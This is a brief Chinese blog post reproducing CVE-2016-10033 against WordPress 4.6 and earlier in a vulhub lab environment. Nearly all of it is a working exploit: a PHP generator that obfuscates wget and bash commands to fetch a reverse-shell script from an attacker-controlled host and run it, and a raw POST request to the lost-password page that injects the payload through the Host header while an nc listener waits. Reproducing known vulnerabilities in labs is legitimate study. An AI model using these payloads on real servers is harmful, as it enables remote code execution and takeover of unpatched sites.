WordPress

1.漏洞复现

CVE-2016-10033(vulhub pwnscriptum)

影响范围:WordPress <= 4.6

访问 http://IP/wp-admin/install.php 进行安装

使用PHP脚本生成Payload
<?php
$shell1 = '/usr/bin/wget --output-document /tmp/shell 自己网站IP/shell.txt'; //下载反弹shell脚本
$shell2 = '/bin/bash /tmp/shell'; //运行脚本

$shell1 = str_replace('/','${substr{0}{1}{$spool_directory}}',str_replace(' ','${substr{10}{1}{$tod_log}}',$shell1));
$shell2 = str_replace('/','${substr{0}{1}{$spool_directory}}',str_replace(' ','${substr{10}{1}{$tod_log}}',$shell2));

echo 'target(any -froot@localhost -be ${run{'.$shell1.'}} null)<br><br>';
echo 'target(any -froot@localhost -be ${run{'.$shell2.'}} null)';

访问忘记密码页面,路径:/wp-login.php?action=lostpassword

填入存在的用户名->获取新密码抓包

先用NC监听,将 Host 改为 Payload 反弹shell

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell}} null)
Content-Length: 85
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: close

user_login=admin&redirect_to=&wp-submit=%E8%8E%B7%E5%8F%96%E6%96%B0%E5%AF%86%E7%A0%81
posted @ 2023-01-15 20:47  Hacker&Cat  阅读(29)  评论(0编辑  收藏  举报